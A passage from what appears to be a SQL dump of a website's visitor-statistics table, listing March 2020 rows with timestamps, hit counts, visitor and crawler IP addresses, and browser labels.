3,1583165880,1,1,0,0,'207.46.13.95','other'),(485994,1583166037,1,1,0,0,'207.46.13.76','other'),(485995,1583166435,1,1,0,0,'93.73.160.193','firefox'),(485996,1583166671,1,1,0,0,'207.46.13.210','other'),(485997,1583167552,1,1,0,0,'93.73.160.193','firefox'),(485998,1583168951,1,1,0,0,'178.154.171.134','other'),(485999,1583169150,1,1,0,0,'91.196.178.179','chrome'),(486000,1583169246,1,1,0,0,'199.244.88.131','chrome'),(486001,1583170159,1,1,0,0,'178.154.171.134','other'),(486002,1583170351,1,1,0,0,'46.211.155.201','chrome'),(486003,1583170591,1,1,0,0,'93.73.160.193','firefox'),(486004,1583170725,1,1,0,0,'8.29.198.26','other'),(486005,1583170893,1,1,0,0,'207.46.13.79','other'),(486006,1583171127,2,1,1,0,'207.46.13.210',''),(486007,1583171416,1,1,0,0,'178.154.171.127','other'),(486008,1583172091,1,1,0,0,'178.154.171.134','other'),(486009,1583172804,1,1,0,0,'141.8.142.164','other'),(486010,1583173048,1,1,0,0,'91.196.178.179','chrome'),(486011,1583173144,1,1,0,0,'91.196.178.67','chrome'),(486012,1583173746,1,1,0,0,'178.154.171.127','other'),(486013,1583174021,1,1,0,0,'91.196.178.179','chrome'),(486014,1583174248,1,0,1,0,'207.46.13.95',''),(486015,1583175112,1,1,0,0,'8.29.198.25','other'),(486016,1583176276,1,0,1,0,'66.249.64.26',''),(486017,1583178381,1,1,0,0,'207.46.13.210','other'),(486018,1583178489,1,1,0,0,'91.196.178.134','firefox'),(486019,1583178543,1,1,0,0,'37.9.113.10','other'),(486020,1583178593,1,1,0,0,'66.249.64.27','chrome'),(486021,1583178885,1,1,0,0,'46.201.53.242','chrome'),(486022,1583180348,1,1,0,0,'178.154.171.127','other'),(486023,1583180716,1,1,0,0,'178.154.171.134','other'),(486024,1583180955,2,2,0,0,'95.213.141.126','opera'),(486025,1583181250,1,1,0,0,'66.249.64.26','chrome'),(486026,1583182020,1,1,0,0,'8.29.198.25','other'),(486027,1583182098,1,0,1,0,'207.46.13.95',''),(486028,1583182395,1,1,0,0,'178.154.171.127','other'),(486029,1583182434,1,1,0,0,'178.154.171.134','other'),(486030,1583182702,1,1,0,0,'207.46.13.95','other'),(486031,1583183671,1,1,0,0,'207.46.13.79','other'),(486032,1583185072,1,1,0,0,'207.46.13.79','other'),(486033,1583185142,1,1,0,0,'199.127.56.236','chrome'),(486034,1583185396,1,1,0,0,'207.46.13.95','other'),(486035,1583186338,1,1,0,0,'8.29.198.25','other'),(486036,1583187505,1,1,0,0,'207.46.13.210','other'),(486037,1583187953,1,1,0,0,'178.154.171.134','other'),(486038,1583189904,1,1,0,0,'66.249.64.27','chrome'),(486039,1583190820,1,0,1,0,'207.46.13.95',''),(486040,1583190885,38,38,0,0,'116.203.59.65','firefox'),(486041,1583190888,2,2,0,0,'116.203.59.65','other'),(486042,1583191887,1,1,0,0,'141.8.142.2','other'),(486043,1583192523,1,1,0,0,'66.249.64.27','chrome'),(486044,1583193061,1,1,0,0,'209.17.96.82','other'),(486045,1583193082,1,1,0,0,'8.29.198.26','other'),(486046,1583194827,1,1,0,0,'207.46.13.95','other'),(486047,1583194871,1,0,1,0,'66.249.64.27',''),(486048,1583194975,1,1,0,0,'69.30.210.242','other'),(486049,1583195696,1,1,0,0,'66.249.64.27','chrome'),(486050,1583196747,1,1,0,0,'66.249.64.26','chrome'),(486051,1583196749,1,0,1,0,'66.249.64.27',''),(486052,1583196913,1,1,0,0,'62.205.134.182','other'),(486053,1583197387,1,1,0,0,'178.154.171.127','other'),(486054,1583197580,1,1,0,0,'8.29.198.25','other'),(486055,1583197754,23,23,0,0,'173.212.245.240','other'),(486056,1583197808,2,2,0,0,'178.154.171.134','other'),(486057,1583198153,1,1,0,0,'141.8.132.2','other'),(486058,1583198664,26,26,0,0,'173.212.245.240','other'),(486059,1583201672,1,1,0,0,'178.154.171.134','other'),(486060,1583202487,1,1,0,0,'66.249.64.27','chrome'),(486061,1583203057,1,1,0,0,'178.154.171.134','other'),(486062,1583203103,1,1,0,0,'116.193.170.50','chrome'),(486063,1583203995,1,1,0,0,'207.46.13.95','other'),(486064,1583204084,1,1,0,0,'8.29.198.26','other'),(486065,1583204572,1,0,1,0,'207.46.13.210',''),(486066,1583205556,1,1,0,0,'207.46.13.79','other'),(486067,1583205939,1,1,0,0,'66.249.64.26','chrome'),(486068,1583205959,1,1,0,0,'207.46.13.210','other'),(486069,1583206098,1,1,0,0,'66.249.64.28','chrome'),(486070,1583206417,1,1,0,0,'66.249.70.33','chrome'),(486071,1583207261,1,1,0,0,'207.46.13.210','other'),(486072,1583207671,1,1,0,0,'178.154.171.134','other'),(486073,1583207838,1,1,0,0,'207.46.13.95','other'),(486074,1583208699,1,1,0,0,'8.29.198.27','other'),(486075,1583209528,1,1,0,0,'178.154.171.127','other'),(486076,1583209665,1,1,0,0,'66.249.64.28','chrome'),(486077,1583212117,1,1,0,0,'66.249.64.27','chrome'),(486078,1583212463,1,1,0,0,'141.8.142.2','other'),(486079,1583212741,1,1,0,0,'207.46.13.79','other'),(486080,1583213002,1,1,0,0,'66.249.70.36','chrome'),(486081,1583213330,1,1,0,0,'178.154.171.134','other'),(486082,1583213948,1,1,0,0,'62.205.134.182','other'),(486083,1583214962,1,1,0,0,'207.46.13.95','other'),(486084,1583215124,1,1,0,0,'5.9.98.234','other'),(486085,1583215193,1,1,0,0,'8.29.198.25','other'),(486086,1583215399,1,1,0,0,'207.46.13.79','other'),(486087,1583216427,1,1,0,0,'178.154.171.134','other'),(486088,1583217130,1,1,0,0,'178.154.171.127','other'),(486089,1583217377,1,1,0,0,'46.211.136.43','chrome'),(486090,1583218778,1,1,0,0,'141.8.142.2','other'),(486091,1583219032,1,1,0,0,'178.154.171.134','other'),(486092,1583219871,1,1,0,0,'8.29.198.26','other'),(486093,1583220109,1,1,0,0,'207.46.13.79','other'),(486094,1583220796,1,1,0,0,'91.196.178.177','chrome'),(486095,1583221376,1,1,0,0,'91.196.178.161','chrome'),(486096,1583221450,1,1,0,0,'91.196.179.138','chrome'),(486097,1583221753,1,1,0,0,'207.46.13.79','other'),(486098,1583222107,1,1,0,0,'178.154.171.134','other'),(486099,1583222254,1,1,0,0,'178.154.171.127','other'),(486100,1583222790,2,2,0,0,'66.249.64.26','chrome'),(486101,1583223537,1,1,0,0,'194.44.122.6','chrome'),(486102,1583223735,2,2,0,0,'207.46.13.79','other'),(486103,1583223742,1,1,0,0,'207.46.13.95','other'),(486104,1583224883,1,1,0,0,'66.249.70.36','chrome'),(486105,1583224938,1,1,0,0,'178.154.171.127','other'),(486106,1583225132,1,1,0,0,'66.249.64.26','chrome'),(486107,1583225219,1,1,0,0,'31.13.127.10','other'),(486108,1583225220,1,1,0,0,'31.13.127.23','other'),(486110,1583226289,1,1,0,0,'8.29.198.27','other'),(486111,1583226626,1,1,0,0,'66.249.70.36','chrome'),(486112,1583227148,1,1,0,0,'91.196.178.161','chrome'),(486113,1583227428,1,1,0,0,'93.73.160.193','firefox'),(486114,1583228533,1,1,0,0,'178.154.171.134','other'),(486115,1583229559,1,1,0,0,'207.46.13.79','other'),(486116,1583229865,1,1,0,0,'207.46.13.95','other'),(486117,1583230265,1,1,0,0,'66.249.64.26','chrome'),(486118,1583230781,1,1,0,0,'35.174.60.104','chrome'),(486119,1583230964,1,1,0,0,'8.29.198.25','other'),(486120,1583231110,1,1,0,0,'66.249.70.62','chrome'),(486121,1583231526,1,1,0,0,'91.196.178.92','firefox'),(486122,1583231689,1,1,0,0,'207.46.13.79','other'),(486123,1583231764,1,1,0,0,'93.73.160.193','firefox'),(486124,1583231834,1,1,0,0,'207.46.13.210','other'),(486125,1583231914,1,1,0,0,'66.249.64.27','chrome'),(486126,1583232334,1,1,0,0,'141.8.183.33','other'),(486127,1583232349,21,21,0,0,'82.165.202.218','firefox'),(486128,1583232454,1,1,0,0,'66.249.64.26','chrome'),(486129,1583232912,1,1,0,0,'178.154.171.134','other'),(486130,1583233460,1,1,0,0,'93.73.160.193','firefox'),(486131,1583233578,1,1,0,0,'91.124.118.158','chrome'),(486132,1583233865,1,1,0,0,'195.10.210.70','chrome'),(486133,1583233896,1,1,0,0,'66.249.64.28','chrome'),(486134,1583234196,1,1,0,0,'66.249.70.36','chrome'),(486135,1583234580,1,1,0,0,'207.46.13.210','other'),(486136,1583235496,1,1,0,0,'66.249.70.36','chrome'),(486137,1583235782,1,1,0,0,'95.108.213.3','other'),(486138,1583235880,1,1,0,0,'86.189.205.158','chrome'),(486139,1583235937,1,1,0,0,'109.74.154.72','chrome'),(486140,1583236789,1,1,0,0,'66.249.70.50','chrome'),(486141,1583236932,1,1,0,0,'207.46.13.79','other'),(486142,1583237116,2,2,0,0,'66.249.64.28','chrome'),(486143,1583237192,1,1,0,0,'141.8.188.25','other'),(486144,1583237417,1,1,0,0,'8.29.198.27','other'),(486145,1583238117,1,1,0,0,'141.8.142.119','other'),(486146,1583239005,1,1,0,0,'141.8.188.20','other'),(486147,1583239076,1,1,0,0,'66.249.70.44','chrome'),(486148,1583239198,1,1,0,0,'66.249.64.28','chrome'),(486149,1583239293,2,2,0,0,'66.249.64.26','chrome'),(486150,1583239338,1,1,0,0,'37.55.57.116','chrome'),(486151,1583239672,1,1,0,0,'37.9.113.200','other'),(486152,1583239792,1,1,0,0,'141.8.183.33','other'),(486153,1583241256,1,1,0,0,'207.46.13.210','other'),(486154,1583241561,1,1,0,0,'95.108.213.39','other'),(486155,1583241588,1,1,0,0,'66.249.64.26','chrome'),(486156,1583241644,1,1,0,0,'95.134.221.157','chrome'),(486157,1583241664,1,1,0,0,'66.249.64.28','chrome'),(486158,1583241845,1,1,0,0,'37.53.228.106','chrome'),(486159,1583242346,1,1,0,0,'8.29.198.25','other'),(486160,1583242794,1,1,0,0,'207.46.13.79','other'),(486161,1583243239,1,1,0,0,'207.46.13.95','other'),(486162,1583243721,1,1,0,0,'37.9.113.39','other'),(486163,1583243825,1,1,0,0,'207.46.13.79','other'),(486164,1583244025,1,1,0,0,'95.108.213.61','other'),(486165,1583244381,2,2,0,0,'178.154.171.134','other'),(486166,1583244539,1,0,1,0,'207.46.13.95',''),(486167,1583244760,2,1,1,0,'66.249.64.26',''),(486168,1583245051,2,1,1,0,'207.46.13.210',''),(486169,1583245131,1,1,0,0,'194.88.207.162','chrome'),(486170,1583245161,1,1,0,0,'207.46.13.245','other'),(486171,1583245166,2,2,0,0,'207.46.13.95','other'),(486172,1583245320,1,1,0,0,'66.249.70.33','chrome'),(486173,1583245390,1,1,0,0,'66.249.64.27','chrome'),(486174,1583245650,1,1,0,0,'207.46.13.79','other'),(486175,1583248792,1,1,0,0,'141.8.142.119','other'),(486176,1583248882,1,1,0,0,'66.249.64.26','chrome'),(486177,1583248917,1,1,0,0,'8.29.198.25','other'),(486178,1583248981,1,1,0,0,'91.196.178.76','firefox'),(486179,1583248999,1,1,0,0,'141.8.188.20','other'),(486180,1583249081,1,1,0,0,'66.249.64.27','chrome'),(486181,1583249632,1,1,0,0,'66.249.70.33','chrome'),(486182,1583249973,1,1,0,0,'207.46.13.79','other'),(486183,1583250282,2,2,0,0,'66.249.64.26','chrome'),(486184,1583251216,1,0,1,0,'207.46.13.95',''),(486185,1583251490,1,1,0,0,'31.13.127.4','other'),(486186,1583251491,1,1,0,0,'31.13.127.22','other'),(486188,1583251673,1,1,0,0,'66.249.64.27','chrome'),(486189,1583252289,1,1,0,0,'66.249.64.26','chrome'),(486190,1583252434,3,3,0,0,'66.249.64.28','chrome'),(486191,1583252687,1,1,0,0,'207.46.13.79','other'),(486192,1583253220,1,1,0,0,'13.66.139.0','other'),(486193,1583253314,1,1,0,0,'86.126.73.63','chrome'),(486194,1583253768,1,1,0,0,'8.29.198.27','other'),(486195,1583254604,1,1,0,0,'66.249.64.26','chrome'),(486196,1583255174,1,1,0,0,'66.249.64.27','chrome'),(486197,1583256613,1,1,0,0,'185.151.84.102','chrome'),(486198,1583259849,2,2,0,0,'66.249.64.28','chrome'),(486199,1583259992,1,1,0,0,'66.249.64.26','chrome'),(486200,1583260254,1,1,0,0,'66.249.64.27','chrome'),(486201,1583260430,1,1,0,0,'8.29.198.26','other'),(486202,1583260787,1,1,0,0,'207.46.13.204','other'),(486203,1583260963,1,1,0,0,'37.110.135.242','chrome'),(486204,1583260975,1,1,0,0,'95.24.82.241','chrome'),(486205,1583261213,1,1,0,0,'66.249.64.26','chrome'),(486206,1583262940,1,1,0,0,'66.249.64.27','chrome'),(486207,1583263128,2,2,0,0,'66.249.64.26','chrome'),(486208,1583263810,1,1,0,0,'66.249.70.33','chrome'),(486209,1583263888,1,1,0,0,'66.249.64.28','chrome'),(486210,1583263957,1,1,0,0,'207.46.13.95','other'),(486211,1583264681,1,1,0,0,'66.249.64.27','chrome'),(486212,1583265153,1,1,0,0,'8.29.198.25','other'),(486213,1583266429,2,2,0,0,'66.249.64.26','chrome'),(486214,1583267242,2,2,0,0,'207.46.13.95','other'),(486215,1583267857,2,2,0,0,'91.209.11.236','other'),(486216,1583267917,1,1,0,0,'66.249.64.28','chrome'),(486217,1583268870,1,1,0,0,'207.46.13.204','other'),(486218,1583268979,1,1,0,0,'91.209.11.236','other'),(486219,1583269054,2,2,0,0,'207.46.13.210','other'),(486220,1583269139,3,2,1,0,'207.46.13.79',''),(486221,1583269393,1,1,0,0,'45.133.35.78','chrome'),(486222,1583269558,1,1,0,0,'173.252.127.37','other'),(486223,1583269559,1,1,0,0,'173.252.127.42','other'),(486225,1583270521,1,1,0,0,'45.133.35.78','chrome'),(486226,1583271657,1,1,0,0,'8.29.198.26','other'),(486227,1583271975,2,2,0,0,'46.211.150.223','chrome'),(486228,1583272714,1,1,0,0,'207.46.13.95','other'),(486229,1583272774,1,1,0,0,'66.249.70.62','chrome'),(486230,1583273105,1,1,0,0,'188.243.213.11','chrome'),(486231,1583273288,1,0,1,0,'207.46.13.204',''),(486232,1583273331,1,1,0,0,'207.46.13.204','other'),(486233,1583273671,2,2,0,0,'66.249.64.27','chrome'),(486234,1583274948,1,1,0,0,'91.196.178.1','chrome'),(486235,1583275295,2,2,0,0,'66.249.64.28','chrome'),(486236,1583276473,1,1,0,0,'8.29.198.25','other'),(486237,1583277895,2,2,0,0,'207.46.13.204','other'),(486238,1583280519,2,1,1,0,'66.249.64.27',''),(486239,1583280604,1,1,0,0,'207.46.13.204','other'),(486240,1583280974,1,1,0,0,'66.249.64.28','chrome'),(486241,1583281566,1,1,0,0,'209.17.96.82','other'),(486242,1583282110,1,1,0,0,'31.13.115.7','other'),(486243,1583282111,2,2,0,0,'31.13.115.20','other'),(486244,1583282628,1,1,0,0,'66.249.70.62','chrome'),(486245,1583282993,1,1,0,0,'207.46.13.79','other'),(486246,1583283077,1,1,0,0,'207.46.13.204','other'),(486247,1583283153,1,1,0,0,'8.29.198.26','other'),(486248,1583283314,1,1,0,0,'62.205.134.182','other'),(486249,1583283901,1,0,1,0,'157.55.39.166',''),(486250,1583284192,1,1,0,0,'157.55.39.166','other'),(486251,1583284259,1,1,0,0,'66.249.64.27','chrome'),(486252,1583284480,1,1,0,0,'207.46.13.79','other'),(486253,1583284535,1,1,0,0,'207.46.13.204','other'),(486254,1583285513,2,2,0,0,'207.46.13.204','other'),(486255,1583286206,1,1,0,0,'178.154.171.134','other'),(486256,1583286208,1,1,0,0,'95.108.213.55','other'),(486257,1583286486,1,1,0,0,'207.46.13.79','other'),(486258,1583287266,1,1,0,0,'66.249.64.26','chrome'),(486259,1583287323,1,1,0,0,'207.46.13.204','other'),(486260,1583287894,1,1,0,0,'8.29.198.25','other'),(486261,1583288192,1,1,0,0,'207.46.13.79','other'),(486262,1583289289,1,1,0,0,'141.8.132.12','other'),(486263,1583289446,1,1,0,0,'141.8.142.128','other'),(486264,1583290338,1,1,0,0,'95.108.181.103','other'),(486265,1583290541,1,1,0,0,'213.159.213.236','other'),(486266,1583290566,1,1,0,0,'66.249.70.36','chrome'),(486267,1583292414,2,2,0,0,'207.46.13.204','other'),(486268,1583293014,1,1,0,0,'66.249.64.28','chrome'),(486269,1583293325,1,1,0,0,'91.209.11.236','other'),(486270,1583293524,1,0,1,0,'207.46.13.204',''),(486271,1583294248,1,1,0,0,'66.249.64.26','chrome'),(486272,1583294359,1,1,0,0,'66.249.64.28','chrome'),(486273,1583294528,1,1,0,0,'66.249.64.27','chrome'),(486274,1583294536,1,1,0,0,'207.46.13.79','other'),(486275,1583294572,1,1,0,0,'8.29.198.25','other'),(486276,1583295582,2,2,0,0,'66.249.64.26','chrome'),(486277,1583295590,1,1,0,0,'207.46.13.79','other'),(486278,1583295635,1,1,0,0,'5.45.207.65','other'),(486279,1583295927,2,1,1,0,'157.55.39.166',''),(486280,1583295991,1,1,0,0,'66.249.64.28','chrome'),(486281,1583297934,1,1,0,0,'23.94.83.114','firefox'),(486282,1583298065,1,1,0,0,'66.249.64.27','chrome'),(486283,1583298556,1,1,0,0,'66.249.70.62','chrome'),(486284,1583298889,1,1,0,0,'207.46.13.46','other'),(486285,1583298990,1,1,0,0,'66.249.64.27','chrome'),(486286,1583299174,1,1,0,0,'8.29.198.27','other'),(486287,1583299691,1,1,0,0,'66.249.70.36','chrome'),(486288,1583299875,1,1,0,0,'66.249.64.26','chrome'),(486289,1583300500,1,1,0,0,'141.8.183.73','other'),(486290,1583301297,1,0,1,0,'157.55.39.166',''),(486291,1583301577,1,1,0,0,'207.46.13.46','other'),(486292,1583302680,1,1,0,0,'5.45.207.49','other'),(486293,1583302727,1,1,0,0,'207.46.13.46','other'),(486294,1583302899,1,1,0,0,'207.46.13.79','other'),(486295,1583303679,1,1,0,0,'141.8.142.2','other'),(486296,1583303807,1,1,0,0,'40.77.189.142','other'),(486297,1583304032,1,1,0,0,'157.55.39.166','other'),(486298,1583304159,1,1,0,0,'66.249.64.26','chrome'),(486299,1583304379,1,1,0,0,'62.205.134.182','other'),(486300,1583304683,2,2,0,0,'207.46.13.46','other'),(486301,1583305186,1,1,0,0,'128.124.92.115','chrome'),(486302,1583305312,2,2,0,0,'69.58.178.57','other'),(486303,1583305636,1,1,0,0,'91.196.178.82','chrome'),(486304,1583305852,1,1,0,0,'8.29.198.26','other'),(486305,1583306161,1,1,0,0,'66.249.70.36','chrome'),(486306,1583306547,1,1,0,0,'66.249.64.28','chrome'),(486307,1583306688,1,1,0,0,'91.196.178.69','chrome'),(486308,1583306762,1,1,0,0,'91.196.178.82','chrome'),(486309,1583306850,1,1,0,0,'66.249.64.26','chrome'),(486310,1583307039,1,1,0,0,'40.77.188.27','other'),(486311,1583307041,1,1,0,0,'40.77.189.30','other'),(486313,1583307042,1,1,0,0,'40.77.188.96','other'),(486315,1583307044,1,1,0,0,'40.77.189.251','other'),(486318,1583307045,1,1,0,0,'40.77.190.31','other'),(486321,1583307046,1,1,0,0,'40.77.188.100','other'),(486323,1583307047,1,1,0,0,'40.77.190.26','other'),(486324,1583307048,1,1,0,0,'40.77.188.17','other'),(486327,1583307049,1,1,0,0,'40.77.189.57','other'),(486329,1583307267,2,0,2,0,'157.55.39.166',''),(486330,1583307876,1,1,0,0,'207.46.13.79','other'),(486331,1583307931,1,1,0,0,'91.196.178.168','chrome'),(486332,1583308491,1,1,0,0,'91.196.178.69','chrome'),(486333,1583308744,1,1,0,0,'66.249.64.26','chrome'),(486334,1583308783,2,1,1,0,'157.55.39.166',''),(486335,1583309639,1,1,0,0,'66.249.64.28','chrome'),(486336,1583309913,1,1,0,0,'95.47.248.24','chrome'),(486337,1583309935,2,2,0,0,'207.46.13.79','other'),(486338,1583310300,1,1,0,0,'77.111.244.209','chrome'),(486339,1583310406,1,1,0,0,'8.29.198.25','other'),(486340,1583310667,1,1,0,0,'207.46.13.46','other'),(486341,1583310872,3,3,0,0,'157.55.39.166','other'),(486342,1583310925,1,1,0,0,'178.154.171.127','other'),(486343,1583311069,1,1,0,0,'95.47.248.24','chrome'),(486344,1583311284,1,1,0,0,'66.249.64.26','chrome'),(486345,1583311391,1,1,0,0,'178.154.171.134','other'),(486346,1583312532,1,1,0,0,'178.154.171.127','other'),(486347,1583312534,1,1,0,0,'91.196.177.46','chrome'),(486348,1583312893,1,1,0,0,'66.249.64.28','chrome'),(486349,1583313838,1,1,0,0,'37.9.113.33','other'),(486350,1583313843,1,1,0,0,'207.46.13.46','other'),(486351,1583313924,1,1,0,0,'31.13.127.17','other'),(486352,1583313925,1,1,0,0,'31.13.127.18','other'),(486354,1583314373,2,2,0,0,'95.47.248.24','chrome'),(486355,1583316896,1,1,0,0,'35.172.111.91','chrome'),(486356,1583317439,1,1,0,0,'8.29.198.26','other'),(486357,1583317501,1,0,1,0,'66.249.64.27',''),(486358,1583317658,1,1,0,0,'66.249.64.28','chrome'),(486359,1583318686,1,1,0,0,'141.8.183.111','other'),(486360,1583318861,2,2,0,0,'207.46.13.46','other'),(486361,1583319762,2,2,0,0,'95.213.141.126','opera'),(486362,1583320210,1,1,0,0,'31.13.127.22','other'),(486363,1583320211,1,1,0,0,'31.13.127.7','other'),(486364,1583320212,1,1,0,0,'31.13.127.8','other'),(486365,1583320292,1,1,0,0,'141.8.142.119','other'),(486366,1583320467,1,1,0,0,'207.46.13.46','other'),(486367,1583320701,2,2,0,0,'182.253.16.171','chrome'),(486368,1583320911,1,1,0,0,'178.95.244.177','chrome'),(486369,1583321388,1,1,0,0,'66.249.64.26','chrome'),(486370,1583321615,1,1,0,0,'8.29.198.27','other'),(486371,1583321641,1,1,0,0,'109.74.154.72','chrome'),(486372,1583321686,1,1,0,0,'178.154.171.134','other'),(486373,1583321692,2,2,0,0,'157.55.39.166','other'),(486374,1583321802,1,1,0,0,'66.249.64.28','chrome'),(486375,1583321827,1,1,0,0,'207.46.13.79','other'),(486376,1583323181,1,0,1,0,'157.55.39.166',''),(486377,1583324343,1,1,0,0,'157.55.39.166','other'),(486378,1583324544,1,1,0,0,'36.80.169.13','chrome'),(486379,1583325579,1,1,0,0,'37.9.113.10','other'),(486380,1583325785,1,1,0,0,'37.9.113.177','other'),(486381,1583326098,1,1,0,0,'141.8.142.115','other'),(486382,1583326533,1,1,0,0,'116.193.170.50','chrome'),(486383,1583326550,1,1,0,0,'91.196.178.166','chrome'),(486384,1583326836,1,1,0,0,'91.196.178.102','chrome'),(486385,1583327145,1,1,0,0,'87.250.224.90','other'),(486386,1583327871,2,1,1,0,'157.55.39.166',''),(486387,1583328084,1,1,0,0,'178.154.171.127','other'),(486388,1583328748,1,1,0,0,'8.29.198.26','other'),(486389,1583328947,1,1,0,0,'66.249.64.27','chrome'),(486390,1583330287,1,1,0,0,'66.249.70.62','chrome'),(486391,1583330703,1,1,0,0,'178.154.171.134','other'),(486392,1583330723,1,1,0,0,'91.196.178.166','chrome'),(486393,1583332827,1,1,0,0,'8.29.198.27','other'),(486394,1583332936,1,1,0,0,'213.180.203.218','other'),(486395,1583333617,1,1,0,0,'213.180.203.186','other'),(486396,1583334219,1,1,0,0,'66.249.70.62','chrome'),(486397,1583335249,1,1,0,0,'2.47.39.215','other'),(486398,1583337553,1,1,0,0,'66.249.64.27','chrome'),(486399,1583338050,1,1,0,0,'178.154.171.127','other'),(486400,1583338829,1,1,0,0,'46.211.128.30','chrome'),(486401,1583339694,1,1,0,0,'213.180.203.11','other'),(486402,1583340406,1,1,0,0,'8.29.198.26','other'),(486403,1583340751,1,1,0,0,'157.55.39.166','other'),(486404,1583341556,1,1,0,0,'213.180.203.186','other'),(486405,1583341739,1,1,0,0,'207.46.13.79','other'),(486406,1583342705,4,4,0,0,'157.55.39.166','other'),(486407,1583342839,2,2,0,0,'207.46.13.79','other'),(486408,1583343378,1,1,0,0,'66.249.64.27','chrome'),(486409,1583343459,1,1,0,0,'188.166.81.180','chrome'),(486410,1583343637,1,1,0,0,'157.55.39.166','other'),(486411,1583343912,1,1,0,0,'207.46.13.206','other'),(486412,1583344037,1,1,0,0,'8.29.198.26','other'),(486413,1583344176,1,1,0,0,'66.249.64.28','chrome'),(486414,1583344385,2,1,1,0,'207.46.13.79',''),(486415,1583344389,1,0,1,0,'207.46.13.46',''),(486416,1583345394,1,1,0,0,'66.249.64.28','chrome'),(486417,1583345449,1,1,0,0,'213.180.203.100','other'),(486418,1583345611,1,1,0,0,'213.180.203.186','other'),(486419,1583346857,1,1,0,0,'66.249.64.26','chrome'),(486420,1583348254,1,1,0,0,'207.46.13.46','other'),(486421,1583348529,2,2,0,0,'207.46.13.79','other'),(486422,1583348659,1,1,0,0,'91.209.11.236','other'),(486423,1583349445,1,1,0,0,'46.211.208.34','chrome'),(486424,1583349727,1,1,0,0,'66.249.64.26','chrome'),(486425,1583349736,1,1,0,0,'157.55.39.164','other'),(486426,1583349901,1,1,0,0,'207.46.13.79','other'),(486427,1583351262,1,0,1,0,'207.46.13.79',''),(486428,1583351728,1,1,0,0,'8.29.198.26','other'),(486429,1583352070,1,1,0,0,'66.249.64.27','chrome'),(486430,1583352136,1,1,0,0,'207.46.13.46','other'),(486431,1583352997,1,1,0,0,'141.8.142.2','other'),(486432,1583353104,1,1,0,0,'141.8.132.2','other'),(486433,1583353566,1,1,0,0,'46.211.225.19','chrome'),(486434,1583353763,1,1,0,0,'46.211.147.15','chrome'),(486435,1583354313,1,1,0,0,'178.154.171.127','other'),(486436,1583354392,1,1,0,0,'66.249.70.33','chrome'),(486437,1583355300,1,1,0,0,'8.29.198.25','other'),(486438,1583355524,1,1,0,0,'207.46.13.46','other'),(486439,1583356930,1,1,0,0,'207.46.13.79','other'),(486440,1583357748,2,2,0,0,'157.55.39.166','other'),(486441,1583358010,1,1,0,0,'207.46.13.46','other'),(486442,1583358738,1,1,0,0,'178.154.171.127','other'),(486443,1583358793,2,2,0,0,'157.55.39.166','other'),(486444,1583359097,2,2,0,0,'178.154.171.134','other'),(486445,1583359432,1,1,0,0,'66.249.64.27','chrome'),(486446,1583360326,1,1,0,0,'157.55.39.166','other'),(486447,1583360430,1,1,0,0,'207.46.13.46','other'),(486448,1583362089,1,1,0,0,'207.46.13.46','other'),(486449,1583362656,1,0,1,0,'157.55.39.166',''),(486450,1583363052,1,1,0,0,'8.29.198.27','other'),(486451,1583366344,1,1,0,0,'167.172.229.87','other'),(486452,1583366356,1,1,0,0,'178.154.171.134','other'),(486453,1583366482,1,1,0,0,'8.29.198.27','other'),(486454,1583366873,1,1,0,0,'66.249.64.27','chrome'),(486455,1583367157,1,1,0,0,'157.55.39.248','other'),(486456,1583367595,1,1,0,0,'66.249.70.62','chrome'),(486457,1583369402,1,1,0,0,'157.55.39.166','other'),(486458,1583369423,1,1,0,0,'157.55.39.248','other'),(486459,1583369714,1,1,0,0,'62.205.134.182','other'),(486460,1583369759,1,1,0,0,'66.249.70.33','chrome'),(486461,1583369768,1,1,0,0,'66.249.64.27','chrome'),(486462,1583369805,1,1,0,0,'64.225.10.163','other'),(486463,1583370183,1,1,0,0,'194.55.166.23','msie'),(486464,1583373516,1,1,0,0,'66.249.64.26','chrome'),(486465,1583374579,1,1,0,0,'66.249.64.26','chrome'),(486466,1583374770,1,1,0,0,'8.29.198.26','other'),(486467,1583375010,1,1,0,0,'128.68.28.242','chrome'),(486468,1583378152,1,1,0,0,'66.249.64.27','chrome'),(486469,1583378614,1,1,0,0,'8.29.198.26','other'),(486470,1583379831,1,1,0,0,'157.55.39.164','other'),(486471,1583381609,1,1,0,0,'91.196.178.83','chrome'),(486472,1583381692,1,1,0,0,'91.209.11.236','other'),(486473,1583381819,1,1,0,0,'31.13.115.22','other'),(486474,1583381821,1,1,0,0,'31.13.115.18','other'),(486477,1583381822,1,1,0,0,'31.13.115.3','other'),(486478,1583381865,4,4,0,0,'31.13.115.12','other'),(486479,1583381866,3,3,0,0,'31.13.115.4','other'),(486487,1583381867,1,1,0,0,'31.13.115.1','other'),(486488,1583382117,17,17,0,0,'38.128.66.69','chrome'),(486489,1583383341,6,6,0,0,'82.165.202.218','other'),(486490,1583384396,1,0,1,0,'157.55.39.248',''),(486491,1583385479,1,1,0,0,'207.46.13.46','other'),(486492,1583386075,1,1,0,0,'8.29.198.27','other'),(486493,1583386469,2,2,0,0,'157.55.39.248','other'),(486494,1583386864,1,1,0,0,'62.205.134.182','other'),(486495,1583387048,1,1,0,0,'207.46.13.46','other'),(486496,1583389446,1,0,1,0,'66.249.64.28',''),(486497,1583389919,1,1,0,0,'8.29.198.26','other'),(486498,1583392031,1,1,0,0,'66.249.70.33','chrome'),(486499,1583392103,1,1,0,0,'66.249.64.27','chrome'),(486500,1583392662,1,1,0,0,'157.55.39.164','other'),(486501,1583393265,1,1,0,0,'91.196.178.82','chrome'),(486502,1583393606,1,1,0,0,'18.184.195.200','chrome'),(486503,1583394640,1,1,0,0,'66.249.70.36','chrome'),(486504,1583395313,1,1,0,0,'66.249.64.26','chrome'),(486505,1583395674,1,1,0,0,'66.249.70.33','chrome'),(486506,1583395859,1,1,0,0,'66.249.64.28','chrome'),(486507,1583396013,1,1,0,0,'91.196.178.186','chrome'),(486508,1583397370,1,1,0,0,'8.29.198.27','other'),(486509,1583399407,1,1,0,0,'134.249.146.125','chrome'),(486511,1583400292,1,1,0,0,'34.204.170.184','chrome'),(486512,1583400370,1,1,0,0,'91.196.178.186','chrome'),(486513,1583400464,1,1,0,0,'134.249.146.125','chrome'),(486514,1583401076,1,1,0,0,'8.29.198.27','other'),(486515,1583401446,1,1,0,0,'178.154.171.134','other'),(486516,1583401658,1,1,0,0,'46.219.217.92','chrome'),(486517,1583401783,1,1,0,0,'178.154.171.127','other'),(486518,1583402363,2,2,0,0,'178.154.171.134','other'),(486519,1583402755,1,1,0,0,'134.249.146.125','chrome'),(486520,1583403295,1,1,0,0,'66.249.64.27','chrome'),(486521,1583403382,1,1,0,0,'178.154.171.134','other'),(486